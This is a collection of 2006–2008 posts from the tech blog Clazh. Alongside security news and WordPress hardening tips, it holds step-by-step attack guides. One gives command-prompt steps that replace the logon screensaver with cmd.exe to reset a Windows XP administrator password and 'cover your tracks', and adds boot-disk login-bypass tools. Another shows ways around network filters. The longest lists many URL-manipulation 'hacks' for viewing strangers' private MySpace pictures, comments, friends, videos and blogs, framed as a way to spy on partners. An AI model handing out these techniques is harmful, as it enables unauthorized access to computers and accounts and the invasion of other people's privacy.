• AhnLab (V3)
• Aladdin (eSafe)
• ALWIL (Avast! Antivirus)
• Authentium (Command Antivirus)
• Avira (AntiVir)
• Bit9 (FileAdvisor)
• Cat Computer Services (Quick Heal)
• ClamAV (ClamAV)
• CA Inc. (Vet)
• Doctor Web, Ltd. (DrWeb)
• Eset Software (ESET NOD32)
• ewido networks (ewido anti-malware)
• Fortinet (Fortinet)
• FRISK Software (F-Prot)
• F-Secure (F-Secure)
• AVG Technologies (AVG)
• Hacksoft (The Hacker)
• Ikarus Software (Ikarus)
• Kaspersky Lab (AVP)
• McAfee (VirusScan)
• Microsoft (Malware Protection)
• Norman (Norman Antivirus)
• Panda Security (Panda Platinum)
• Prevx (Prevx1)
• Rising Antivirus (Rising)
• Secure Computing (Webwasher)
• Softwin (BitDefender)
• Sophos (SAV)
• Sunbelt Software (Antivirus)
• Symantec (Norton Antivirus)
• VirusBlokAda (VBA32)
• VirusBuster (VirusBuster)

Related posts:

1. How To Remove SpyWare, AdWare Clean and Fix Windows
2. The Best Free Blogging Tools for Power Bloggers
3. Listen To Free Music Online Using Blogmusik
4. Ultimate List of The Best Flickr Tools And Services
5. How To Run Multiple Accounts GTalk, Yahoo Messenger And MSN Messenger

© Arpit Jacob for Clazh, 2008. | Permalink | 3 comments | Add to del.icio.us
Catergories: Internet, Software Tags: Anti-Virus, Repair, Security

This shows that Apple had more than 5 times the number of flaws per month than Windows XP and Vista in 2007, and most of these flaws are serious. Clearly this goes against conventional wisdom because the numbers show just the opposite and it isn’t even close.

Also noteworthy is that while Windows Vista shows fewer flaws than Windows XP and has more mitigating factors against exploitation, the addition of Windows Defender and Sidebar added 4 highly critical flaws to Vista that weren’t present in Windows XP. Sidebar accounted for three of those additional vulnerabilities and it’s something I am glad I don’t use. The lone Defender critical vulnerability that was supposed to defend Windows Vista was ironically the first critical vulnerability for Windows Vista.

Source CybernetNews

Related posts:

1. Wordpress Security Alert Adsense Deluxe Plugin Vulnerable
2. Wow Apple Releases Safari Browser For Windows
3. Windows 7 Activation Key Crack By Hackers, Chew WGA & RemoveWGA
4. How to Hack or Crack a Windows XP Administrator Password
5. Its Official Windows Vista SP1 To Be Out In Mid July

© Arpit Jacob for Clazh, 2007. | Permalink | 11 comments | Add to del.icio.us
Catergories: Apple, Software, Technology Tags: Mac, Security

1. Drop the WordPress Meta Tag

By default a large number of WordPress themes have the WordPress Meta Tag which show the version of WordPress that is currently running on the blog. I have even removed the Powered by WordPress links from the footer this has reduced spam by a certain degree.

2. Disable Access to your Directory Indexes.

If you are not aware by default if some types in the path to your Plugins Directory they can view a list of all files in the directory. The best way to disable this is through the HTACCESS file. add the line given at the bottom of your Htaccess file in the root of your blog.

Options -Indexes

The other way to disable it as outlined by matt cutts is to put a blank index.php or index.html file in the Plugins directory.

3. Disable access to /wp-admin/

This is the most drastic measure you can take. i.e. to block access to the wp-admin directory using htaccess. But this will work only if you browse the net with a Static IP address. Also this is not necessary if you are using the latest version of WordPress.

4. Bonus Point Keep your WordPress Blog upto date using The Wordpress Automatic Upgrade Plugin

Related posts:

1. The Best Way To Kill Blog Spam Forever
2. Clean A Free Wordpress Theme
3. Wordpress Security Alert Adsense Deluxe Plugin Vulnerable
4. SandPress 0.71 WordPress Theme Update
5. Reduce Comment Spam To Zero Without Akismet

© Arpit Jacob for Clazh, 2007. | Permalink | 8 comments | Add to del.icio.us
Catergories: General, Wordpress Tags: Hacking, Security, Wordpress

Well, Apple, you should’ve seen it coming. With the tremendous amount of hype that the iPhone received, you should’ve expected hackers to go full throttle on exploiting their $600 toys. Thankfully, for now, it’s only researchers that are pumping out the exploits.

Everyone always gets flustered when they get hear that the “Feds” might be spying on them via their cellular communication devices. But how would you feel if you knew that some guy who lives in Nigeria was listening to your phone calls, reading your email, viewing your SMS logs, and looking over the phone numbers of your friends(if you have any, of course). I don’t know about you, but those thoughts aren’t very comforting. But if Apple doesn’t hurry up, it could become a reality. Via an exploit in the Safari browser(used on the iPhone, and available to PC and Mac owners), researchers at Independent Security Evaluators have been able to do all of those wonderful invasions of privacy.

This exploit can be taken advantage of with malicious code (which obviously has not been released) in web pages that you may be visiting. Thus, for the time being, it would be a good idea to only visit sites that you trust(like Clazh), unless you want your own miniature Paris Hilton scandal. Thankfully, you won’t have to wait TOO long for a patch, because Apple has proposed a fix that will be coming at the BlackHat conference on August 2nd. Only 10 more days until the Apple-faithful can go back to touting the complete safety that is provided from their true love.

A video of the exploit can be found here.

Related posts:

1. Wow Apple Releases Safari Browser For Windows
2. Wordpress 2.2 Security Alert SQL Injection Exploit
3. Why Virtualization Is The Future
4. Good Bye Apple You Suck Really Bad
5. Three WordPress Security Tips

© Arpit Jacob for Clazh, 2007. | Permalink | No comment | Add to del.icio.us
Catergories: Apple, General Tags: General, Safari, Security

Main purpose of the project: to demonstrate the real state of security in search engines. There are vulnerabilities in the engines (that mean that their developers insufficiently attend to security) and the community need to know about that. When he will be knowing truth, every user of Internet will can make thoughtful choice concerning search engines.

In the project took part 33 search engines (30 web engines and 3 local engines) of 19 vendors, some vendors have several engines. The list of project’s participants (in order of appearance): Meta, Yahoo, HotBot, Gigablast, MSN, Clusty, Yandex, Yandex.Server (local engine), Search Europe, Rambler, Ask.com, Ezilon, AltaVista, AltaVista local (local engine), MetaCrawler, Mamma, Google, Google Custom Search Engine (local engine), My Way, Lycos, Aport, Netscape Search, WebCrawler, Dogpile, AOL Search, My Search, My Web Search, LookSmart, DMOZ (Open Directory Project), InfoSpace, Euroseek, Kelkoo, Excite.

Altogether there were published 104 vulnerabilities in mentioned engines. Including Cross-Site Scripting (as XSS, and as HTML Injection), Full path disclosure, Content Spoofing and Information disclosure vulnerabilities. It is without taking into account redirectors in search engines (altogether there were published 23 redirectors).

Results of the projects: fixed 44 vulnerabilities from 104 (without taking into account redirectors). It is 42,31% fixed vulnerabilities. Owners of search engines have a place for improvements of their engines’ security.

Out of all these Search Engines Google was the one that didn’t fix any of the holes.

Source: CodeInMyBug and websecurity.com.ua

Related posts:

1. Wordpress Security Alert Adsense Deluxe Plugin Vulnerable
2. Google Docs And SpreadSheets Redesigned
3. Unblock Blocked Websites like Myspace, Bebo and Orkut
4. Google Maps Adds More Coverage For India
5. John Chow Gets Kicked Out of Google

© Arpit Jacob for Clazh, 2007. | Permalink | One comment | Add to del.icio.us
Catergories: Google, Internet, Technology Tags: Hacking, Security

The Plugin has not been updated yet so please head over to David’s blog to download the temporary fix.

You might also want to subscribe to the new blog that focus on Vulnerabilities and security alerts for Wordpress.

Related posts:

1. Security alert: WordPress Competition Winning Plugins Vulnerable
2. Wordpress 2.2 Security Alert SQL Injection Exploit
3. How to Write a WordPress Plugin Series
4. Copy Feed Wordpress Plugin Translated To English
5. Google The Worst When It Comes To Security

© Arpit Jacob for Clazh, 2007. | Permalink | 2 comments | Add to del.icio.us
Catergories: Blogging, Wordpress Tags: Adsense, Security, Wordpress

Windows XP Privilege Escalation Exploit

(Before you continue Read the Updates at the bottom)

Here are the steps involved to Hack the Window XP Administrator Password .

1. Go to Start –> Run –> Type in CMD
2. You will get a command prompt. Enter these commands the way it is given
3. cd\
4. cd\ windows\system32
5. mkdir temphack
6. copy logon.scr temphack\logon.scr
7. copy cmd.exe temphack\cmd.exe
8. del logon.scr
9. rename cmd.exe logon.scr
10. exit

Wait its not over read the rest to find out how to Hack the Window XP Administrator Password
A Brief explanation of what you are currently doing here is

Your are nagivating to the windows system Directory where the system files are stored. Next your creating a temporary directory called mkdir. After which you are copying or backing up the logon.scr and cmd.exe files into the mkdir then you are deleting the logon.scr file and renaming cmd.exe file to logon.scr.

So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command

net user password

Example: If the admin user name is clazh and you want change the password to pass Then type in the following command

net user clazh pass

This will chang the admin password to pass.
Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do.

Here are the steps involved to De Hack or restore the Window XP Administrator Password to cover your tracks.

1. Go to Start –> Run –> Type in CMD
2. You will get a command prompt. Enter these commands the way it is given
3. cd\
4. cd\ windows\system32\temphack
5. copy logon.scr C:\windows\system32\logon.scr
6. copy cmd.exe C:\windows\system32\cmd.exe
7. exit

Or simply go to C:\windows\system32\temphack and copy the contents of temphack back into system32 directory click Yes to overwrite the modified files.

Via internetbusinessdaily.net

Note To administrators: You can block the entire password change thing just a little tweak in the local security policy (control panel->administrative tools,works only for administrators group) will disallow any change in password even if u r the Admin (u can put a number of other restrictions too), but be cautious to give other users limitted accounts. After you have done this, the above Screensaver technique will fail.

Update: Christian Mohn points out The Above method is is possible only if you have Local Administrator Privileges. My fault for not checking it up before posting.

Update: The above Method only works if the system is FAT/FAT32 – because of the updated “user rights management” in NTFS – file level rights etc. This does not work on a system using NTFS.

Hack or Crack a Windows XP Administrator Password using OphCrack

Ophcrack is a Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a GTK+ Graphical User Interface and runs on Windows, Mac OS X (Intel CPU) as well as on Linux.

Go to Ophcrack and download the live CD burn it to a disk and boot with it. It will depend on how strong the password is.

Recover the Password using DreamPackPL

Thanks for the steps from Giftson

Steps to Hack into a Windows XP Computer without changing password:

1. Get physical access to the machine. Remember that it must have a CD or DVD drive.
2. Download DreamPackPL http://www.d–b.webpark.pl/dreampackpl_en.htm
3. Unzip the downloaded dreampackpl_iso.zip and you’ll get dreampackpl.ISO.
4. Use any burning program that can burn ISO images.
5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.
6. Press “R” to install DreamPackPL.
7. Press “C” to install DreamPackPL by using the recovery console.
8. Select the Windows installation that is currently on the computer (Normally is “1? if you only have one Windows installed)
9. Backup your original sfcfiles.dll by typing: “ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld” (without quotes)
10. Copy the hacked file from CD to system32 folder. Type: “copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without quotes and assuming your CD drive is D:)
11. Type “exit”, take out disk and reboot.
12. In the password field, type “dreamon” (without quotes) and DreamPack menu will appear.
13. Click the top graphic on the DreamPack menu and you will get a menu popup.
14. Go to commands and enable the options and enable the god command.
15. Type “god” in the password field to get in Windows.

You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.

Note: If you are running any kind of Anti-Virus Tool it will give you a prompt saying that it is a Virus since they have already labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. The DreamPackPL helps you bypass the Windows Login screen and it is not destructive.

Recover All Windows Password including Vista with Login Recovery

Login Recovery is a Online service that can help you to recover your Windows Password including Windows Vista.

There are three steps Involved

1. Download the Login Recovery Software extraction program to create a bootable floppy disk to read the password file.
   (click here for a CD version)
2. Insert the disk into the computer you wish to recover passwords from and boot the computer to extract the encrypted passwords to the disk.
3. Put the disk into an Internet enabled computer, and upload the encrypted password file for decryption. (see uploads page)

This is a Paid service but Alternativly they Provide a free service which is available by waiting upto 48 hours (Only One free request every three months so be careful how you use it).

Related posts:

1. Recover Lost Forgotten Windows XP Administrator Password
2. Windows 7 Activation Key Crack By Hackers, Chew WGA & RemoveWGA
3. Myspace Hack : Profile url And MySpace Email
4. How To Hack Myspace Private profile picture and video
5. Windows Live Suite All Live Products in One?

© Arpit Jacob for Clazh, 2007. | Permalink | 84 comments | Add to del.icio.us
Catergories: Microsoft, Technology Tags: Hacking, Security, Windows

1. Use Google services to Unblock and access blocked sites like Orkut, Myspace, Bebo,

A. Using Google’s Translation Service

In this method We’ll try to exploit Google’s Translation Service to unblock the filter to access Orkut. Look at the given url below since we want to view the webpage in English we modify the parameters such that it translate from English to English. Use the given link below and try logging in to orkut. http://www.google.com/translate?langpair=en|en&u=www.orkut.com Sometimes the link may break out from the frame Example when you Initially login into Orkut or it might redirect you back to http://www.orkut.com in which case again use the given link above.

B. Using the Google Mobile Search

http://www.google.com/xhtmlThis is not a great option since it displays them as it would look like when you are viewing them on a mobile phone. Also it strips out all the javascript content and CSS scripts and breaks a longer page into several smaller pages. Example http://www.google.com/gwt/n?u=clazh.com

2. Using Proxy Servers to or Unblock Filters/Firewalls at office

Proxy Servers are Computer servers hosted on internet that allow you to access websites through them indirectly. They act as the middleman. First thing is to find a “proxy server.” Simply search the internet for “proxy servers”. (Note: A proxy server might not work later. Therefore, learn how to find them. For these instructions, we will use an actual proxy server in Taiwan with the technical specs “address 139.223.199.194″ and “port 8080″. I have given Below a list of links to various Proxy Servers try them. Try these links given below

• A List of Proxies
• A directory of free web-based proxy services
• A Directory of free proxy servers

Then proceed as follows: Internet Explorer 6.0

1. On the Tools menu in Internet Explorer, click Internet Options, click the Connections tab, and then click LAN Settings.
2. Under Proxy server, click to select the Use a proxy server for your LAN check box.
3. In the Address box, type the IP address of the proxy server.
4. In the Port box, type the port number that is used by the proxy server for client connections (by default, 8080).
5. You can click to select the Bypass proxy server for local addresses check box if you do not want the proxy server computer to be used when you connect to a computer on the local network (this may speed up performance).
6. Click OK to close the LAN Settings dialog box.
7. Click OK again to close the Internet Options dialog box.

3. Use IP resolution to access/unblock weak firewalls/filters

Principle behind the breaking This only works for filters that check only for the domain name to be blocked and not the IP address of the domain name we know that the domain name is essentially an alias for the IP address of the website. All we have to do is to replace the domain name by its corresponding IP address. Below is a example using http://myspace.com as a example. Just Google for the Term “WHOIS” it will give you a large list of website that you can use to check the Ip address of a Website. For this example I am using http://whois.domaintools.com Which will show you huge list of information about the website scroll down a bit and it will show you the IP address of Myspace. Just copy paste this IP address in your browser and you should be able to start browsing the blocked site.

4. Using the TOR Network Tor (The Onion Router) to Bypass/Unblock firewall restrictions Only For Advanced users.

This Method is only for the extremely desperate example countries where parts of the internet is Censored example places like China, Iran and other Islamic Countries. Therefore if you are from China or Iran you can use the TOR. But for this you need to download ans installed the TOR Software and also requires you to have high speed internet since accessing websites through TOR is relatively slower.

Tor (The Onion Router) is a free software implementation of second-generation onion routing a system enabling its users to communicate anonymously on the Internet. Originally sponsored by the US Naval Research Laboratory, Tor became an Electronic Frontier Foundation (EFF) project in late 2004. The EFF supported Tor financially until November 2005 and continues to provide web hosting for the project.

Use TorPark which is A variant of the Firefox Browser with setting for TOR inbuilt inside it You can read the full manual here on how to use it http://www.torrify.com/manual.php

Related posts:

1. A Terrorist’s Profile On Orkut
2. Myspace Hack : Profile url And MySpace Email
3. How To Hack Myspace Private profile picture and video
4. Google Launches Official Gmail and Orkut Blogs
5. Google The Worst When It Comes To Security

© Arpit Jacob for Clazh, 2007. | Permalink | 129 comments | Add to del.icio.us
Catergories: Internet, Technology Tags: Firewall, Hacking, Myspace, Security, Unblock

Myspace has become ridiculously easy to hack. I try my best to keep this blog updates with the latest hacks/codes that I find over the internet. These days even amateurs spend their time trying to hack into Myspace. I seen a number of hacks and codes released for Myspace from hacks and code for private profiles, pictures, videos, comments etc. As Myspace continues to patch up these hacks but users keep discovering new security holes and hacks and code. Just do a google search for “Myspace hack” or “Myspace code” you’ll find tons of websites that claim to have found some kind of vulnerability on myspace or found some code that can compromise Myspace security settings for private profiles, pictures, videos, comments etc. Majority of the users searching for myspace hacks/code are usually people who either want to check up on their girlfriends or boyfriends. Most of these codes to hack Myspace involve some kind of url modification.

Update 27 October 2006: Latest Codes updated.
New Code: to view Private blogs Added
Credit: Grownupgeek, joyboner

Code :

http://blog.myspace.com/index.cfm?fuseaction=blog.edit&friendID=XXXXXX&blogID=XXXXXX

Explanation :
This is just an URL hack so it won’t last long,
1. You replace the friendID with their friendid, and blogid with their blogid… got it?

Well to view these the profile has to be public, or a friend of yours. You have to be able to see the blogs listed on their profile.

To get friendID and blogID, right click on the link and copy it, pick out the friendID and blogID.

http://blog.myspace.com/index.cfm?fuseaction=blog.view&friendID=122498109&blogID=184962006&MyToken=1f49gc99-83e9-45y0-b1dc-1de09d556d27

View Private Pictures: *dead!
- use one of the following urls by replacing the XX’s with the desired friend ID.

http://forum.myspace.com/user/viewPicture.cfm?friendid=XXXXXX
http://groups.myspace.com/user/viewPicture.cfm?friendid=XXXXXX
http://editprofile.myspace.com/user/viewPicture.cfm?friendid=XXXXXX
http://events.myspace.com/user/viewPicture.cfm?friendid=XXXXXX
http://invite.myspace.com/user/viewPicture.cfm?friendid=XXXXXX
http://mail.myspace.com/user/viewPicture.cfm?friendid=XXXXXX
http://favorites.myspace.com/user/viewPicture.cfm?friendid=XXXXXX
http://classifieds.myspace.com/user/viewPicture.cfm?friendid=XXXXXX
http://search.myspace.com/user/viewPicture.cfm?friendid=XXXXXX

View Private Comments: *dead!
- use one of the following urls by replacing the XX’s with the desired friend ID.
- to get past the 1st page, change the page=0 to page=1, page=2, ect..
- as agreed, thegeek from the that site also has other working codes for viewing comments on private profiles.. you can find them by doing a google search for “grownupgeek”

http://collect.myspace.com/user/viewallcomments.cfm?friendid=XXXXX&page=0
http://events.myspace.com/user/viewallcomments.cfm?friendid=XXXXX&page=0
http://favorites.myspace.com/user/viewallcomments.cfm?friendid=XXXXX&page=0
http://mail.myspace.com/user/viewallcomments.cfm?friendid=XXXXX&page=0
http://classifieds.myspace.com/user/viewallcomments.cfm?friendid=XXXXX&page=0
http://vids.myspace.com/user/viewallcomments.cfm?friendid=XXXXX&page=0
http://viewmorepics.myspace.com/index.cfm?fuseaction=user.viewComments&friendid=XXXXXX
http://home.myspace.com/index.cfm?fuseaction=user.viewComments&friendid=XXXXXX
http://au.myspace.com/index.cfm?fuseaction=user.viewComments&friendid=XXXXXX
http://fr.myspace.com/index.cfm?fuseaction=user.viewComments&friendid=XXXXXX
http://de.myspace.com/index.cfm?fuseaction=user.viewComments&friendid=XXXXXX
http://ie.myspace.com/index.cfm?fuseaction=user.viewComments&friendid=XXXXXX
http://uk.myspace.com/index.cfm?fuseaction=user.viewComments&friendid=XXXXXX
http://forum.myspace.com/index.cfm?fuseaction=profile.safedeleteComments&friendid=XXXXXX
http://groups.myspace.com/index.cfm?fuseaction=profile.safedeleteComments&friendid=XXXXXX
http://editprofile.myspace.com/index.cfm?fuseaction=profile.safedeleteComments&friendid=XXXXXX
http://events.myspace.com/index.cfm?fuseaction=profile.safedeleteComments&friendid=XXXXXX
http://invite.myspace.com/index.cfm?fuseaction=profile.safedeleteComments&friendid=XXXXXX
http://mail.myspace.com/index.cfm?fuseaction=profile.safedeleteComments&friendid=XXXXXX
http://favorites.myspace.com/index.cfm?fuseaction=profile.safedeleteComments&friendid=XXXXXX
http://classifieds.myspace.com/index.cfm?fuseaction=profile.safedeleteComments&friendid=XXXXXX
http://search.myspace.com/index.cfm?fuseaction=profile.safedeleteComments&friendid=XXXXXX

View Private Friends List: *alive!
- use one of the following urls by replacing the XX’s with the desired friend ID.
- to get past the 1st page of friends, change the page=1 to page=2, page=3, ect.

http://collect.myspace.com/user/viewfriends.cfm?friendID=XXXX&page=1
http://vids.myspace.com/user/viewfriends.cfm?friendID=XXXX&page=1
http://forum.myspace.com/user/viewfriends.cfm?friendID=XXXX&page=1
http://groups.myspace.com/user/viewfriends.cfm?friendID=XXXX&page=1
http://editprofile.myspace.com/user/viewfriends.cfm?friendID=XXXX&page=1
http://events.myspace.com/user/viewfriends.cfm?friendID=XXXX&page=1
http://invite.myspace.com/user/viewfriends.cfm?friendID=XXXX&page=1
http://mail.myspace.com/user/viewfriends.cfm?friendID=XXXX&page=1
http://favorites.myspace.com/user/viewfriends.cfm?friendID=XXXX&page=1
http://classifieds.myspace.com/user/viewfriends.cfm?friendID=XXXX&page=1
http://search.myspace.com/user/viewfriends.cfm?friendID=XXXX&page=1

View Private Videos: *alive!
- use one of the following urls by replacing the XX’s with the desired friend ID.

http://collect.myspace.com/index.cfm?fuseaction=vids.showvids&friendid=XXXXX
http://vids.myspace.com/index.cfm?fuseaction=vids.showvids&friendid=XXXXX
http://forum.myspace.com/index.cfm?fuseaction=vids.showvids&friendid=XXXXX
http://groups.myspace.com/index.cfm?fuseaction=vids.showvids&friendid=XXXXX
http://editprofile.myspace.com/index.cfm?fuseaction=vids.showvids&friendid=XXXXX
http://events.myspace.com/index.cfm?fuseaction=vids.showvids&friendid=XXXXX
http://invite.myspace.com/index.cfm?fuseaction=vids.showvids&friendid=XXXXX
http://mail.myspace.com/index.cfm?fuseaction=vids.showvids&friendid=XXXXX
http://favorites.myspace.com/index.cfm?fuseaction=vids.showvids&friendid=XXXXX
http://classifieds.myspace.com/index.cfm?fuseaction=vids.showvids&friendid=XXXXX
http://search.myspace.com/index.cfm?fuseaction=vids.showvids&friendid=XXXXX

Message ANYONE: *alivish!
- works with private profiles & away messages. this one needs to be fixed now!
- use one of the following urls by replacing the XX’s with the desired friend ID.

http://messaging.myspace.com/Modules/Messaging/Pages/SendMessage.aspx?fuseaction=mail.reply&friendId=XXXX
http://home.myspace.com/Modules/Messaging/Pages/SendMessage.aspx?fuseaction=mail.reply&friendId=XXXX
http://www.myspace.com/Modules/Messaging/Pages/SendMessage.aspx?fuseaction=mail.reply&friendId=XXXX
http://myspace.com/Modules/Messaging/Pages/SendMessage.aspx?fuseaction=mail.reply&friendId=XXXX
http://au.myspace.com/Modules/Messaging/Pages/SendMessage.aspx?fuseaction=mail.reply&friendId=XXXX
http://fr.myspace.com/Modules/Messaging/Pages/SendMessage.aspx?fuseaction=mail.reply&friendId=XXXX
http://de.myspace.com/Modules/Messaging/Pages/SendMessage.aspx?fuseaction=mail.reply&friendId=XXX
http://ie.myspace.com/Modules/Messaging/Pages/SendMessage.aspx?fuseaction=mail.reply&friendId=XXXX
http://uk.myspace.com/Modules/Messaging/Pages/SendMessage.aspx?fuseaction=mail.reply&friendId=XXXX

View Private Blogs: *alive!
- this is for private BLOGS not private profile blogs..
- props to both Rachel & Metasyntactic for this one!
- this one doesn’t need the replacing of friend ID’s.. just one word

example: if you go to view a blog and you see the red text saying that this blog is set for friends only, or preferred list only, or set to blog owner only, all you have to do is change one word in the url.

http://blog.myspace.com/index.cfm?fuseaction=blog.view&blogID=1234&friendid=1234

change the red to:

http://blog.myspace.com/index.cfm?fuseaction=blog.edit&blogID=1234&friendid=1234

Update October 14: Thank to Grownupgeek again for pointing out newly available hacks.

forum.myspace.com/user/viewallcomments.cfm?friendid=XXXX&page=xx

Also Found a new website which keeps the latest codes upto date. Check it out http://www.joyboner.com/archives/53

Update September 16: Head over to read Myspace hack to download any song for Free Again. I think myspace has turned into what windows has done for operating systems. It has become so popular that even amature sit and waste their time trying to hack in myspace.

Update: September 13: Yet another hack has been discovered by Grownupgeek this time it allows you to view comments posted on private Myspace profiles. Grownupgeek is running a poll to see if it should be posted up go and vote here. Update: September 9: Another security hole again by GrownupGeek who was tipped off about it.

This security hole in Myspace will allow anyone to view upcoming friend’s birthdays on Myspace profiles that are marked as private. This new hole is particularly interesting because it gives anyone the opportunity to see who the ‘friends’ are on a private profile, providing that person has an upcoming birthday. Below is the URL modification that exposes upcoming birthdays on private Myspace profiles: http://collect.myspace.com/index.cfm?fuseaction= user.birthdays&friendid=XXXXXXX *insert the Myspace friendID at the end in place of the XXXXX

UPDATE: September 3: A New security Hole has been discovered. This time you can use to view private videos. Its not such a great hack since youtube is more popular for hosting videos. The hack again makes use of simple URL Modifications. Myspace sure has some lousy programmers. The hack is given below. http://vids.myspace.com/index.cfm?fuseaction =vids.showvids&friendid=XXXXXXX *insert the Myspace friendID at the end in place of the XXXXX Once again thanks to GrownupGeek UPDATE: August 31: The second hole has also been patched up. Update August 29th: A new security Hole has been discovered though the exploit/hack has not been show. you can read it here. Myspace private profiles still open to SIMPLE URL vulnerability Update August 28th: Myspace has patched this security hole it will no longer work Ok the title sounds rather dramatic. grownupgeek is a geek website. Someone initially started a thread How to view Private Profiles in Myspace to see if there way a way to hack into myspace to view private profiles and picture. The hack was discovered by xxrachelnicolexx. The hack is rather simple wonder why no one found this earlier. Everyone know Myspace sucks big time, its mostly infested with Teenagers and pedophiles. Orginal Post here Below is the Myspace code that can be used to view private profiles

http://editprofile.myspace.com/index.cfm? fuseaction=profile.safeDeleteComments&FriendID=***

Replace *** with the Myspace friendID

To view the pictures on a private profile, try this

http://collect.myspace.com/user/viewPicture.cfm? friendID= **

Replace ** with the friendID there

Related posts:

1. Myspace Hack : Profile url And MySpace Email
2. Unblock Blocked Websites like Myspace, Bebo and Orkut
3. A Terrorist’s Profile On Orkut
4. How to Hack or Crack a Windows XP Administrator Password
5. Facebook Hack : Switch Or Turn Off Facebook Lite To Default

© Arpit Jacob for Clazh, 2007. | Permalink | 158 comments | Add to del.icio.us
Catergories: Internet, Technology Tags: Hacking, Internet, Myspace, Security